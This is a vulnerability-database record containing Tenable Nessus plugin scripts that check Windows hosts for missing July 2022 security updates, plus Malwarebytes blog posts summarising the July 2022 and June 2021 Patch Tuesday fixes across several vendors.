"CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22031", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22045", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-22711", "CVE-2022-27776", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30212", "CVE-2022-30213", "CVE-2022-30214", "CVE-2022-30215", "CVE-2022-30216", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30222", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226", "CVE-2022-33644"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015807.NASL", "href": "https://www.tenable.com/plugins/nessus/163048", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163048);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22028\",\n \"CVE-2022-22029\",\n \"CVE-2022-22031\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22038\",\n \"CVE-2022-22039\",\n \"CVE-2022-22040\",\n \"CVE-2022-22041\",\n \"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22045\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-22711\",\n \"CVE-2022-27776\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30212\",\n \"CVE-2022-30213\",\n \"CVE-2022-30214\",\n \"CVE-2022-30215\",\n \"CVE-2022-30216\",\n \"CVE-2022-30220\",\n \"CVE-2022-30221\",\n \"CVE-2022-30222\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\",\n \"CVE-2022-33644\"\n );\n script_xref(name:\"MSKB\", value:\"5015807\");\n script_xref(name:\"MSFT\", value:\"MS22-5015807\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015807: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015807. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22029, CVE-2022-22038,\n CVE-2022-22039, CVE-2022-30211, CVE-2022-30214,\n CVE-2022-30221, CVE-2022-30222)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031,\n CVE-2022-22034, CVE-2022-22036, CVE-2022-22037,\n CVE-2022-22041, CVE-2022-22045, CVE-2022-22047,\n CVE-2022-22049, CVE-2022-22050, CVE-2022-30202,\n CVE-2022-30205, CVE-2022-30206, CVE-2022-30209,\n CVE-2022-30215, CVE-2022-30220, CVE-2022-30224,\n CVE-2022-30225, CVE-2022-30226)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015807\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015807\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015807\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30215\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015807'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nvar os_name = get_kb_item(\"SMB/ProductName\");\n\nif (\n ( (\"enterprise\" >< tolower(os_name) || \"education\" >< tolower(os_name))\n &&\n smb_check_rollup(os:'10',\n os_build:19042,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015807]) \n )\n ||\n smb_check_rollup(os:'10',\n os_build:19043,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015807])\n || \n smb_check_rollup(os:'10',\n os_build:19044,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015807])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T15:01:32", "description": "The remote Windows host is missing security update 5015827. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22045, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22038, CVE-2022-30211, CVE-2022-30221, CVE-2022-30222)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015827: Windows Server 2022 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22031", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22045", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-22711", "CVE-2022-23816", "CVE-2022-23825", "CVE-2022-27776", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30212", "CVE-2022-30213", "CVE-2022-30214", "CVE-2022-30215", "CVE-2022-30216", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30222", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015827.NASL", "href": "https://www.tenable.com/plugins/nessus/163045", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163045);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22028\",\n \"CVE-2022-22029\",\n \"CVE-2022-22031\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22038\",\n \"CVE-2022-22039\",\n \"CVE-2022-22040\",\n \"CVE-2022-22041\",\n \"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22045\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-22711\",\n \"CVE-2022-23816\",\n \"CVE-2022-23825\",\n \"CVE-2022-27776\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30212\",\n \"CVE-2022-30213\",\n \"CVE-2022-30214\",\n \"CVE-2022-30215\",\n \"CVE-2022-30216\",\n \"CVE-2022-30220\",\n \"CVE-2022-30221\",\n \"CVE-2022-30222\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015827\");\n script_xref(name:\"MSFT\", value:\"MS22-5015827\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015827: Windows Server 2022 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015827. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031,\n CVE-2022-22034, CVE-2022-22036, CVE-2022-22037,\n CVE-2022-22041, CVE-2022-22045, CVE-2022-22047,\n CVE-2022-22049, CVE-2022-22050, CVE-2022-30202,\n CVE-2022-30205, CVE-2022-30206, CVE-2022-30209,\n CVE-2022-30220, CVE-2022-30224, CVE-2022-30225,\n CVE-2022-30226)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22038, CVE-2022-30211,\n CVE-2022-30221, CVE-2022-30222)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015827\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015827\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015827\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22041\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015827'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:20348,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015827])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2022-07-16T16:17:19", "description": "It\u2019s time to triage a lot of [patching](<https://www.malwarebytes.com/business/vulnerability-patch-management>) again. Microsoft\u2019s July Patch Tuesday includes an actively exploited local privilege escalation vulnerability in the Windows Client/Server Runtime Subsystem (CSRSS). This vulnerability immediately made it to the Cybersecurity &amp; Infrastructure Security Agency (CISA) list of [known to be exploited in the wild list](<https://blog.malwarebytes.com/reports/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities/>) that are due for patching by August 2, 2022.\n\n## Microsoft\n\nIn total the Microsoft updates include fixes for 84 vulnerabilities. Four of these vulnerabilities are labelled as \u201cCritical\u201d since they are remote code execution (RCE) vulnerabilities.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that ware assigned to the four Critical vulnerabilities:\n\n[CVE-2022-22029](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22029>): Windows Network File System (NFS) RCE vulnerability. This vulnerability is not exploitable in NFSV4.1. Prior to updating your version of Windows that protects against this vulnerability, you can mitigate an attack by disabling NFSV3, but this may adversely affect your ecosystem and should only be used as a temporary mitigation.\n\n[CVE-2022-22039](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22039>): Another Windows Network File System (NFS) RCE vulnerability. It&#x27;s possible to exploit this vulnerability over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger an RCE.\n\n[CVE-2022-22038](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22038>): Remote Procedure Call Runtime RCE vulnerability. Successful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.\n\n[CVE-2022-30221](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30221>): Windows Graphics Component RCE vulnerability. An attacker would have to convince a targeted user to connect to a malicious RDP server. On connecting, the malicious server could execute code on the victim&#x27;s system in the context of the targeted user.\n\n## Azure Site Recovery\n\nA huge part of the patches consist of 32 vulnerabilities in the Azure Site Recovery suite that could have allowed attackers to gain elevated privileges or perform remote code execution. [Azure Site Recovery](<https://docs.microsoft.com/en-us/azure/site-recovery/>) is an integrated disaster recovery service for Azure that helps ensure business continuity by keeping business apps and workloads running during outages.\n\nAccording to Microsoft, [SQL injection](<https://www.malwarebytes.com/glossary/sql-injection>) vulnerabilities caused most of the privilege escalation bugs in Azure Site Recovery.\n\n## CVE-2022-22047\n\nThe vulnerability that is known to be exploited in the wild is an elevation of privilege (EoP) vulnerability. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.\n\nThis type of vulnerability usually comes into play once an attacker has gained an initial foothold. They can then use this vulnerability to gain more permissions and expand their access to the compromised system.\n\nThe vulnerability is described as a Windows CSRSS Elevation of Privilege vulnerability. CSRSS is the Windows component that provides the user mode side of the Win32 subsystem. CSRSS is critical for a system\u2019s operation and is mainly responsible for Win32 console handling and GUI shutdown.\n\nThis type of vulnerability are often chained together with others in macros, which makes the decision to [roll back Office Macro blocking](<https://blog.malwarebytes.com/business/2022/07/microsoft-appears-to-be-rolling-back-office-macro-blocking/>) incomprehensible, even if it is only temporary.\n\n## Other vendors\n\nOther vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.\n\nAdobe released [security updates](<https://helpx.adobe.com/security.html>) for Acrobat, Character Animator, Photoshop, Reader, and RoboHelp.\n\nCisco released critical updates for Cisco Expressway Series, Cisco TelePresence Video Communication Server, Cisco Email Security Appliance, Cisco Secure Email and Web Manager, Cisco Small Business RV110W, RV130, RV130W, and RV215W routers, and [several other security updates](<https://tools.cisco.com/security/center/publicationListing.x>).\n\nCitrix released [hotfixes](<https://support.citrix.com/article/CTX461397/citrix-hypervisor-security-bulletin-for-cve202223816-and-cve202223825>) to address a problem that may affect Citrix Hypervisor and Citrix XenServer under some circumstances.\n\nGoogle released [Android&#x27;s July security updates](<https://source.android.com/security/bulletin/2022-07-01>) including 3 labelled as \u201cCritical\u201d.\n\nSAP released its [July 2022 Patch Day bulletin](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>) with 20 new Security Notes.\n\nVMWare released [security updates](<https://www.vmware.com/security/advisories.html>).\n\nStay safe, everyone!\n\nThe post [Update now\u2014July Patch Tuesday patches include fix for exploited zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/07/update-now-july-patch-tuesday-patches-include-fix-for-exploited-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-13T12:21:53", "type": "malwarebytes", "title": "Update now\u2014July Patch Tuesday patches include fix for exploited zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-30221"], "modified": "2022-07-13T12:21:53", "id": "MALWAREBYTES:90BD6A9BB937B6617FDC4FE73A86B38A", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/07/update-now-july-patch-tuesday-patches-include-fix-for-exploited-zero-day/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-15T08:32:16", "description": "This patch Tuesday harvest was another big one. The Windows updates alone included seven zero-day vulnerability updates, two of them are actively being used in the wild by a group called PuzzleMaker, four others that have also been seen in the wild, plus one other zero-day vulnerability not known to have been actively exploited. Add to that 45 vulnerabilities that were labelled important, and security updates for Android, Adobe, SAP, and Cisco. You can practically see the IT staff scrambling to figure out what to do first and what needs to be checked before applying the patches.\n\n### PuzzleMaker\n\nSecurity researchers have discovered a new threat actor dubbed [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>), that was found using a chain of Google Chrome and Windows 10 zero-day exploits in highly targeted attacks against multiple companies worldwide. Unfortunately the researchers were unable to conclusively identify the Chrome vulnerability that was used (but they do have a suspect). The good news is that the two Windows vulnerabilities in the attack chain were included in the Windows 10 KB5003637 &amp; KB5003635 cumulative updates. These vulnerabilities are listed as [CVE-2021-31955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31955>), a Windows kernel information disclosure vulnerability, and [CVE-2021-31956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31956>), a Windows NTFS elevation of privilege vulnerability.\n\n### Other critical issues\n\nThe other critical patches made available by Microsoft this June include these actively exploited vulnerabilities:\n\n * [CVE-2021-33739](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33739>), a Microsoft DWM Core Library Elevation of Privilege Vulnerability.\n * [CVE-2021-33742](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742>) Windows MSHTML Platform Remote Code Execution Vulnerability.\n * [CVE-2021-31199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31199>) Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability.\n * [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31201>) another Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability.\n\nNot (yet) actively exploited zero day vulnerability:\n\n * [CVE-2021-31968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31968>) Windows Remote Desktop Services Denial of Service Vulnerability.\n\nOther critical updates:\n\n * [CVE-2021-31963](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31963>) Microsoft SharePoint Server Remote Code Execution Vulnerability.\n * [CVE-2021-31959](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31959>) Scripting Engine Memory Corruption Vulnerability.\n * [CVE-2021-31967](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31967>) VP9 Video Extensions Remote Code Execution Vulnerability.\n * [CVE-2021-31985](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31985>) Microsoft Defender Remote Code Execution Vulnerability.\n * [CVE-2021-33742](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742>) Windows MSHTML Platform Remote Code Execution Vulnerability.\n\n### Android\n\nThe [Android Security Bulletin of June 7](<https://source.android.com/security/bulletin/2021-06-01>) mentions a critical security vulnerability in the System component that &quot;could enable a remote attacker using a specially crafted transmission to execute arbitrary code within the context of a privileged process&quot;, which is as bad as it sounds. That vulnerability, listed as [CVE-2021-0507](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-0507>), could allow an attacker to take control of a targeted Android device unless it&#x27;s patched.\n\n### Cisco\n\nCisco has issued a [patch](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-ssl-decrypt-dos-DdyLuK6c>) for a vulnerability in the software-based SSL/TLS message handler of Cisco Firepower Threat Defense (FTD) Software, that could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition. An attacker could exploit this vulnerability by sending a crafted SSL/TLS message **through** an affected device. SSL/TLS messages sent **to** an affected device do not trigger this vulnerability. Cisco informs us that there is no workaround for this issue. Patching is the only solution.\n\n### SAP\n\nIn the SAP advisory for [Security Patch Day \u2013 June 2021](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999>) we can find two issues that are labelled as \u201cHot News\u201d:\n\n * [CVE-2021-276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27602>)[0](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27602>)[2](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27602>) SAP Commerce, versions - 1808, 1811, 1905, 2005, 2011, Backoffice application allows certain authorized users to create source rules which are translated to drools rule when published to certain modules within the application. An attacker with this authorization can inject malicious code in the source rules and perform remote code execution enabling them to compromise the confidentiality, integrity and availability of the application.\n * [CVE-2021-27610](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27610>) Improper Authentication in SAP NetWeaver ABAP Server and ABAP Platform.\n\n### Adobe\n\nTo top things off, Adobe has released a giant [Patch ](<https://helpx.adobe.com/security.html>)[Tuesday security update](<https://helpx.adobe.com/security.html>) release that fixes vulnerabilities in ten applications, including Adobe Acrobat (of course), Reader, and Photoshop. Notably five vulnerabilities in Adobe Acrobat and Reader were fixed that address multiple critical vulnerabilities. Acrobat&#x27;s determination to cement its place as [the new Flash](<https://blog.malwarebytes.com/awareness/2021/01/adobe-flash-player-reaches-end-of-life/>) shows no sign of dimming.\n\nSuccessful exploitation could lead to arbitrary code execution in the context of the current user on both Windows and macOS. The same is true for two critical vulnerabilities in Photoshop that could lead to arbitrary code execution in the context of the current user.\n\n### CVE\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Which is why we try and link you to the Mitre list of CVE\u2019s where possible. It allows interested parties to find and compare vulnerabilities.\n\nHappy patching, everyone!\n\nThe post [Microsoft fixes seven zero-days, including two PuzzleMaker targets, Google fixes serious Android 